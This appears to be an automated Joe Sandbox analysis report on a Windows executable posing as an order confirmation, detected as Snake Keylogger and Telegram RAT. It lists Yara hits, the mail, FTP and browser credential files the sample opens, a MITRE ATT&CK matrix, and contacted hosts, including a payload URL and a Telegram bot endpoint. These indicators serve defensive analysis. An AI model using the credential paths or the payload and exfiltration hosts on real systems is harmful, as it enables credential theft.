                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6568, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6568, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: order confirmation 46574 -QT-04-0022.exe PID: 6568, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Native API                		Path Interception111
                Process Injection                		1
                Masquerading                		2
                OS Credential Dumping                		1
                Security Software Discovery                		Remote Services1
                Email Collection                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		Exfiltration Over Bluetooth1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                Virtualization/Sandbox Evasion                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares2
                Data from Local System                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer13
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Network Configuration Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Software Packing                		DCSync13
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                order confirmation 46574 -QT-04-0022.exe25%VirustotalBrowse
                order confirmation 46574 -QT-04-0022.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                order confirmation 46574 -QT-04-0022.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack100%AviraTR/ATRAPS.GenDownload File
                12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack100%AviraTR/ATRAPS.GenDownload File
                12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack100%AviraTR/ATRAPS.GenDownload File
                12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack100%AviraTR/ATRAPS.GenDownload File
                12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack100%AviraTR/ATRAPS.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                freegeoip.app1%VirustotalBrowse
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://freegeoip.app/xml/0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://checkip.dyndns.orgD8;k0%Avira URL Cloudsafe
                http://checkip.dyndns.org4;k0%Avira URL Cloudsafe
                https://freegeoip.app0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                https://freegeoip.app/xml/84.17.52.18x0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                https://freegeoip.app/xml/84.17.52.180%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://45.137.22.1630%Avira URL Cloudsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg0%Avira URL Cloudsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://freegeoip.app4;k0%Avira URL Cloudsafe
                http://freegeoip.app0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                freegeoip.app
                		188.114.97.7
                		truefalseunknown
                checkip.dyndns.com
                		193.122.6.168
                		truefalseunknown
                checkip.dyndns.org
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://checkip.dyndns.org/false
                • URL Reputation: safe
                		unknown
                https://freegeoip.app/xml/84.17.52.18false
                • URL Reputation: safe
                		unknown
                http://45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpgfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://freegeoip.app/xml/order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.comorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://stackoverflow.com/q/14436606/23354order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/botorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://checkip.dyndns.orgD8;korder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://www.fontbureau.com/designers?order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://checkip.dyndns.org4;korder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://freegeoip.apporder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.tiro.comorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://checkip.dyndns.orgorder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.krorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://freegeoip.app/xml/84.17.52.18xorder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-user.htmlorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354rCannotorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/11564914/23354;order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://checkip.dyndns.org/qorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://45.137.22.163order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342441880.0000000002791000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://checkip.dyndns.comorder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342441880.0000000002791000.00000004.00000800.00020000.00000000.sdmp, order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.529963632.0000000002F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comorder confirmation 46574 -QT-04-0022.exe, 00000000.00000002.345277151.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://freegeoip.app4;korder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530177051.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://freegeoip.apporder confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.530209982.0000000003008000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              188.114.97.7
                                              		freegeoip.appEuropean Union
                                              		13335CLOUDFLARENETUSfalse
                                              45.137.22.163
                                              		unknownNetherlands
                                              		51447ROOTLAYERNETNLfalse
                                              193.122.6.168
                                              		checkip.dyndns.comUnited States
                                              		31898ORACLE-BMC-31898USfalse

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:608167
                                              Start date and time: 12/04/202220:21:262022-04-12 20:21:26 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 41s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:order confirmation 46574 -QT-04-0022.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 104
                                              • Number of non-executed functions: 8
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Adjust boot time
                                              • Enable AMSI

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              20:23:19API Interceptor1x Sleep call for process: order confirmation 46574 -QT-04-0022.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              188.114.97.7http://0kjrj.xyzGet hashmaliciousBrowse
                                              • 0kjrj.xyz/favicon.ico
                                              RFQ 37 - DR104505 - 9404864 -ArcelorMittal.xlsxGet hashmaliciousBrowse
                                              • ilpem-ar.com/pworwz.exe
                                              supply.xlsxGet hashmaliciousBrowse
                                              • controlsvr1.ga/Concord/fre.php
                                              61901.exeGet hashmaliciousBrowse
                                              • www.directionsettingpoint.xyz/inga/?6lo=8BtgmMqaAyTT5C2F4aHPQZ2h2z3JotTfuYVX8E6Ff1S17CFQ3AlPaAhQqFk3VSbA8XFi&o6b=adX4P
                                              4A5l8L43H5.exeGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              TfYc6qqpSW.exeGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              NuGet.Common.dll.exeGet hashmaliciousBrowse
                                              • crypto-hunt.net/loader/uploads/sysadmin.exe
                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                              • www.tigranmelikyan.com/as31/?2db=H5+ZosI6KJVKwubANHezfOEg2n25fhoIhHHgYwkYtXbChFJwiLLahR+ucGe3atKDaBL8&t6Ahe8=mR-0s2hXKbw
                                              sp5zGWm3lp.exeGet hashmaliciousBrowse
                                              • crypto-hunt.net/files/sysadmin.exe
                                              rgxqsVh0vo.exeGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              DOCUMENTO_OFICIAL.54524786078485858624_269.21560870.561007.07248.vbsGet hashmaliciousBrowse
                                              • shuacr.diretosdewashington.us/?1/
